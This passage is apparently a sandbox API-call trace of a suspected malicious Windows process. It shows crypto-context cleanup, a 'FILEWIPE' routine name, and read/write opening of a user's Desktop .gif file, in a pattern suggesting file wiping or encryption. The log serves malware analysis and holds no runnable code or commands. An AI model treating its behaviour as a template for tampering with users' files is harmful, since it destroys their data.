[0077.026] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.026] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.026] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.026] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.026] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.026] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.026] CryptReleaseContext (hProv=0x696ad0, dwFlags=0x0) returned 1 [0077.026] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.026] FreeLibrary (hLibModule=0x77710000) returned 1 [0077.027] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0077.029] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186c4af0, ftCreationTime.dwHighDateTime=0x1d5dd9a, ftLastAccessTime.dwLowDateTime=0x2cc965b0, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0x2cc965b0, ftLastWriteTime.dwHighDateTime=0x1d5e794, nFileSizeHigh=0x0, nFileSizeLow=0xfb13, dwReserved0=0x0, dwReserved1=0x657690, cFileName="8dBnuAEyPilbFpD.gif", cAlternateFileName="8DBNUA~1.GIF")) returned 0x6b89f8 [0077.030] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0077.030] CharLowerBuffW (in: lpsz="byte[64275]", cchLength=0xb | out: lpsz="byte[64275]") returned 0xb [0077.031] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0077.031] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0077.031] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0077.031] FreeLibrary (hLibModule=0x76f90000) returned 1 [0077.031] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.031] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.031] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0077.031] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0077.031] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.031] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.031] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.031] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0077.031] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0077.031] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0077.031] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0077.032] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0077.032] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.032] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.032] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.032] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.032] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.032] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.032] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.033] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.033] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.033] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.033] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.033] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.033] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.033] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.033] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.033] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0077.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0077.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0077.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.034] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0077.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0077.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0077.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0077.034] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0077.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0077.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ada8 [0077.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76ada8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0077.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8dbnuaeypilbfpd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0077.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0077.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0077.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0077.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0077.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0077.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0077.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.038] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0077.038] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0077.038] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.038] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0077.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0077.039] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0077.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0077.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0077.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1b20 | out: hHeap=0x650000) returned 1 [0077.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0077.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0077.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0077.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0077.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0077.042] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0077.042] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.042] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0077.042] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.042] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 